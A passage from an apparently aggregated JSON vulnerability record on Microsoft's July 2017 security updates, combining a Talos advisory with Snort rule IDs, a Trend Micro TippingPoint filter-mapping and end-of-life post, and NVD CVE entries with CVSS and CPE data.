allows Microsoft Browsers to bypass CORS redirect restrictions and follow redirect requests that should otherwise be ignored. An attacker who successfully exploited this vulnerability could force the browser to send data that would otherwise be restricted to a destination web site of their choice.<br /><br /><h4>CVE-2017-8599</h4>A security feature bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. This can be exploited by a user visiting a specially crafted webpage. <br /><br /><h4>CVE-2017-8602</h4>This is a spoofing vulnerability in Microsoft Browser when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities. <br /><br /><h3>Coverage</h3><div><br /></div>In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.<br /><br />Snort Rules:<br />42753<br />42755-42756<br />43460-43463<br />43465-43466<br />43469-43474<br />43490-43493<br />43521-43522<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=21ZcWIIsN98:w-MkB9T8JeY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/21ZcWIIsN98\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-07-11T19:59:29", "published": "2017-07-11T12:59:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/21ZcWIIsN98/ms-tuesday.html", "id": "TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "title": "Microsoft Patch Tuesday - July 2017", "type": "talosblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2017-07-15T11:18:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0170", "CVE-2017-8578", "CVE-2017-8617", "CVE-2017-8608", "CVE-2017-8566", "CVE-2017-8486", "CVE-2017-8501", "CVE-2017-8502", "CVE-2017-8588", "CVE-2017-8580", "CVE-2017-8573", "CVE-2017-8599", "CVE-2017-8587", "CVE-2017-8574", "CVE-2017-8564", "CVE-2017-8556", "CVE-2017-8610", "CVE-2017-8606", "CVE-2017-8619", "CVE-2017-8570", "CVE-2017-8598", "CVE-2017-8607", "CVE-2017-8604", "CVE-2017-8594", "CVE-2017-8560", "CVE-2017-8601", "CVE-2017-8565", "CVE-2017-8596", "CVE-2017-8603", "CVE-2017-8605", "CVE-2017-8561", "CVE-2017-8467", "CVE-2017-8585", "CVE-2017-8562", "CVE-2017-8559", "CVE-2017-8495", "CVE-2017-8609", "CVE-2017-8563", "CVE-2017-8589", "CVE-2017-8592", "CVE-2017-8584", "CVE-2017-8557", "CVE-2017-8581", "CVE-2017-8595", "CVE-2017-0243", "CVE-2017-8611", "CVE-2017-8577", "CVE-2017-8582", "CVE-2017-8602", "CVE-2017-8618", "CVE-2017-8569", "CVE-2017-8463", "CVE-2017-8590"], "description": "\n\nBefore the world of laptops, tablets and smart phones, some of us had to use paper-based solutions to keep track of our calendars and to-do lists. I used a Franklin Planner, where I kept track of my calendar as well as my never-ending to-do list. The Franklin Planner used the \u201cABC\u201d system to help you prioritize your tasks. If you use Microsoft Outlook, you can see this same approach in the Tasks section where you can assign your items with a high, normal, or low priority.\n\nIf you have a large number of tasks on your plate, it\u2019s a nice and easy way to prioritize what you need to work on first.\n\nNow imagine using a Franklin planner to prioritize thousands of security events in your network every 30 seconds? It\u2019s inconceivable! Even if you have an arsenal of security tools at your disposal, how do you determine what to focus on first? To help our customers make sense of what\u2019s going on in their network, we recently announced [SMS Threat Insights](<https://www.trendmicro.com/content/dam/trendmicro/global/en/business/products/network/integrated-atp/security-management-system/SB01_Threat_Insights_2017.pdf>), a new feature in our TippingPoint Security Management System (SMS). SMS Threat Insights aggregates threat data from multiple sources and compiles it to help you prioritize security response measures, increase visibility into current and potential threats impacting your network, and provide insight into preemptive protection actions that may have already been taken. You can learn more about SMS Threat Insights from my blog: [Not All Threats Are Created Equal](<http://blog.trendmicro.com/not-threats-created-equal/>). If you want to see SMS Threat Insights in action, get a quick demo [here](<https://www.youtube.com/watch?v=gc4K2JFS86E&t=12s>).\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before July 11, 2017. Microsoft released patches for Windows, Internet Explorer, Edge, Office, SharePoint, .NET Framework, Exchange, and HoloLens. A total of 19 of these CVEs are rated Critical. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/7/11/the-july-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0170 | | No Vendor Intelligence Provided \nCVE-2017-0243 | 29051 | \nCVE-2017-8463 | | No Vendor Intelligence Provided \nCVE-2017-8467 | | No Vendor Intelligence Provided \nCVE-2017-8486 | | No Vendor Intelligence Provided \nCVE-2017-8495 | | No Vendor Intelligence Provided \nCVE-2017-8501 | | No Vendor Intelligence Provided \nCVE-2017-8502 | | No Vendor Intelligence Provided \nCVE-2017-8556 | | No Vendor Intelligence Provided \nCVE-2017-8557 | | No Vendor Intelligence Provided \nCVE-2017-8559 | | No Vendor Intelligence Provided \nCVE-2017-8560 | | No Vendor Intelligence Provided \nCVE-2017-8561 | | No Vendor Intelligence Provided \nCVE-2017-8562 | | No Vendor Intelligence Provided \nCVE-2017-8563 | | No Vendor Intelligence Provided \nCVE-2017-8564 | | No Vendor Intelligence Provided \nCVE-2017-8565 | | No Vendor Intelligence Provided \nCVE-2017-8566 | | No Vendor Intelligence Provided \nCVE-2017-8569 | | No Vendor Intelligence Provided \nCVE-2017-8570 | | No Vendor Intelligence Provided \nCVE-2017-8573 | | No Vendor Intelligence Provided \nCVE-2017-8574 | | No Vendor Intelligence Provided \nCVE-2017-8577 | 29054 | \nCVE-2017-8578 | 29055 | \nCVE-2017-8580 | | Insufficient Vendor Information \nCVE-2017-8581 | | No Vendor Intelligence Provided \nCVE-2017-8582 | | No Vendor Intelligence Provided \nCVE-2017-8584 | | No Vendor Intelligence Provided \nCVE-2017-8585 | | No Vendor Intelligence Provided \nCVE-2017-8587 | | No Vendor Intelligence Provided \nCVE-2017-8588 | | No Vendor Intelligence Provided \nCVE-2017-8589 | | No Vendor Intelligence Provided \nCVE-2017-8590 | | No Vendor Intelligence Provided \nCVE-2017-8592 | 29048 | \nCVE-2017-8594 | 29046 | \nCVE-2017-8595 | | No Vendor Intelligence Provided \nCVE-2017-8596 | | No Vendor Intelligence Provided \nCVE-2017-8598 | 29050 | \nCVE-2017-8599 | | No Vendor Intelligence Provided \nCVE-2017-8601 | 29047 | \nCVE-2017-8602 | | No Vendor Intelligence Provided \nCVE-2017-8603 | | No Vendor Intelligence Provided \nCVE-2017-8604 | | No Vendor Intelligence Provided \nCVE-2017-8605 | 29049 | \nCVE-2017-8606 | | No Vendor Intelligence Provided \nCVE-2017-8607 | | No Vendor Intelligence Provided \nCVE-2017-8608 | | No Vendor Intelligence Provided \nCVE-2017-8609 | | No Vendor Intelligence Provided \nCVE-2017-8610 | | No Vendor Intelligence Provided \nCVE-2017-8611 | | No Vendor Intelligence Provided \nCVE-2017-8617 | 29056 | \nCVE-2017-8618 | 29045 | \nCVE-2017-8619 | 29057 | \n \n \n\n**End of Sale/End of Life Announcement for TippingPoint N-Series (S660N and S1400N)**\n\nLast week, we announced the end-of-sale (EOS) and end-of-life (EOL) dates for the TippingPoint N-Series solutions (S660N and S1400N). The last day to order the affected products is September 30, 2017 while quantities last. Customers with active maintenance contracts will continue to receive support from TippingPoint\u2019s Technical Assistance Center (TAC) for five years after the end-of-sale date. Maintenance contracts can continue to be purchased to cover the five years of support following the end-of-sale date, however, they must be purchased during the first two years following the end-of-sale date as described in the table below. Maintenance contracts cannot be extend beyond the end-of-support date.\n\n**_Impacted Product SKUs and Descriptions_**\n\n**Part Number ****(HP/Trend Micro)** | **Device Description** | **End of Sale Date** \n---|---|--- \nJC019A/TPNN0020 | TippingPoint S660N Intrusion Prevention System | September 30, 2017 \nJC020A/TPNN0023 | TippingPoint S1400N Intrusion Prevention System | September 30, 2017 \n \n \n\n**_Product End of Life Dates_**\n\n**Milestone** | **Definition** | **End of Sale Date** \n---|---|--- \nEnd of Sale Announcement | The date on which Trend Micro announces the upcoming end of sale and end of support of a product. | July 7, 2017 \nEnd of Sale (Appliance) | The last date to order a product through Trend Micro point of sale. The product is removed from the price list after this date. | September 30, 2017 \nEnd of Sale (Maintenance Renewals) | The last date to order maintenance renewals. | September 30, 2019 \nEnd of Support | The last date that support calls will be accepted for the affected product. RMA\u2019s will cease after this date. Digital Vaccine and ThreatDV updates will cease for the affected products after this date. | September 30, 2022 \n \n \n\nWe recommend that customers upgrade to the most current TippingPoint security platforms. At the time of this bulletin, the Threat Protection System (TPS) models 440T, 2200T and vTPS are the most comparable models to the 660N and 1400N. Contact your sales representative for more information:\n\n| \n\n * TippingPoint 440T Threat Protection System (TPNN0002)\n * TippingPoint 2200T Threat Protection System (TPNN0005)\n * TippingPoint 2600NX Intrusion Prevention System (TPNN0048)\n * Virtual Threat Protection System (TPTN0060) \n---|--- \n| \n \nCustomers with concerns or questions regarding this issue can contact the Trend Micro TippingPoint Technical Assistance Center (TAC).\n\n**Zero-Day Filters**\n\nThere is one new zero-day filter covering one vendor in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Linksys (1)_**\n\n| \n\n * 29060: ZDI-CAN-4892: Zero Day Initiative Vulnerability (Linksys WVBR0)**_ _** \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-3-2017/>).", "modified": "2017-07-14T12:00:02", "published": "2017-07-14T12:00:02", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-july-10-2017/", "id": "TRENDMICROBLOG:E671F1DA89C14989CDFAEB298B71BF9D", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of July 10, 2017", "type": "trendmicroblog", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Edge in Microsoft Windows 10 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user when the JavaScript engine fails to render when handling objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8596, CVE-2017-8610, CVE-2017-8598, CVE-2017-8618, CVE-2017-8619, CVE-2017-8595, CVE-2017-8601, CVE-2017-8604, CVE-2017-8605, CVE-2017-8606, CVE-2017-8607, CVE-2017-8608, and CVE-2017-8609.", "edition": 3, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8603", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8603"], "modified": "2017-07-13T19:30:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-8603", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8603", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 allow an attacker to send specially crafted requests to a .NET web application, resulting in denial of service, aka .NET Denial of Service Vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8585", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8585"], "modified": "2017-12-02T02:29:00", "cpe": ["cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2017-8585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8585", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Windows Shell in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows a remote code execution vulnerability due to the way it improperly handles executable files and shares during rename operations, aka \"Windows Explorer Remote Code Execution Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8463", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8463"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8463", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Graphics in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Microsoft Graphics Component Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-8573 and CVE-2017-8574.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8556", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8556"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8556", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8556", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an information disclosure due to the way it handles objects in memory, aka \"Win32k Information Disclosure Vulnerability\".", "edition": 3, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8486", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8486"], "modified": "2017-07-17T13:19:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8486", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an elevation of privilege vulnerability due to the way that the Windows Common Log File System (CLFS) driver handles objects in memory, aka \"Windows CLFS Elevation of Privilege Vulnerability\".", "edition": 4, "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8590", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8590"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-8590", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8590", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:50", "description": "Win32k in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability when it fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-8578, CVE-2017-8580, CVE-2017-8577, and CVE-2017-8467.", "edition": 4, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "title": "CVE-2017-8581", "type": "cve", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8581"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", 